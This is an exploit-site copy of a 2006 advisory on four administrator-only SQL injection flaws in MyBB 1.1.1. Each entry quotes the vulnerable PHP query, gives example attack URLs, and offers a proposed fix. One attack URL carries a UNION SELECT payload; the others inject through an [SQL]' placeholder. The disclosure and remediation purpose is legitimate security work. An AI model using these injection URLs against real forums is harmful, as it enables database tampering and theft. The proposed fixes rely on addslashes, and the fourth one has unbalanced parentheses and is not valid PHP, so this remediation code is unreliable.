Advertisement






MyBB 1.1.1 Local SQL Injections

CVE Category Price Severity
N/A CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') N/A High
Author Risk Exploitation Type Date
Unknown High Local 2006-05-02
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006050005

Below is a copy:

MyBB Local SQL Injections ..

[ This Local Injections Only For Admin ]

* 1 *

[code]

adminfunctions.php , line 730

$db->query("INSERT INTO ".TABLE_PREFIX."adminlog (uid,dateline,scriptname,action,querystring,ipaddress) VALUES ('".$mybbadmin['uid']."','".$now."','".$scriptname."','".$mybb->input['a
ction']."','".$querystring."','".$ipaddress."')");

$querystring = Not Filtered

Exploit Exm.

/admin/adminlogs.php?action=view&D3vil-0x1=[SQL]'

Fix , Replace with

$db->query("INSERT INTO ".TABLE_PREFIX."adminlog (uid,dateline,scriptname,action,querystring,ipaddress) VALUES ('".$mybbadmin['uid']."','".$now."','".$scriptname."','".$mybb->input['a
ction']."','".addslashes($querystring)."','".$ipaddress."')");

[/code]

* 2 *

[code]

templates.php , lines 107 to 114

$newtemplate = array(

"title" => addslashes($mybb->input['title']),

"template" => addslashes($mybb->input['template']),

"sid" => $mybb->input['setid'],

"version" => $mybboard['vercode'],

"status" => "",

"dateline" => time()

);

sid = Not Filtered

Exploit Exm.

/admin/templates.php?action=do_add&title=Devil&template=Div&setid=[SQL]'

Fix Replace with

$newtemplate = array(

"title" => addslashes($mybb->input['title']),

"template" => addslashes($mybb->input['template']),

"sid" => addslashes($mybb->input['setid']),

"version" => $mybboard['vercode'],

"status" => "",

"dateline" => time()

);

[/code]

* 3 *

[code]

templates.php , line 600

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templatesets WHERE sid='".$expand."'");

$expand = $mybb->input['expand']; = Not Filtered

Exploit Exm.

/admin/templates.php?expand=' UNION ALL SELECT 1,2/*

Fix Replace With

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templatesets WHERE sid='".intval($expand)."'");

[/code]

* 4 *

[code]

templates.php , line 424

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".$mybb->input['title']."' AND sid='".$mybb->input['sid1']."'");

$template1 = $db->fetch_array($query);

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".$mybb->input['title']."' AND sid='".$mybb->input['sid2']."'");

Exploit Exm.

/admin/templates.php?action=diff&title=[SQL]'

/admin/templates.php?action=diff&sid2=[SQL]'

Fix Replace With

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".addslashes($mybb->input['title'])."' AND sid='".intval($mybb->input['sid1'])."'");

$template1 = $db->fetch_array($query);

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".addslashes(($mybb->input['title'])."' AND sid='".intval($mybb->input['sid2'])."'");

[/code]

MyBB Has Many Local Bugs ,, Fix It s00n ;)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum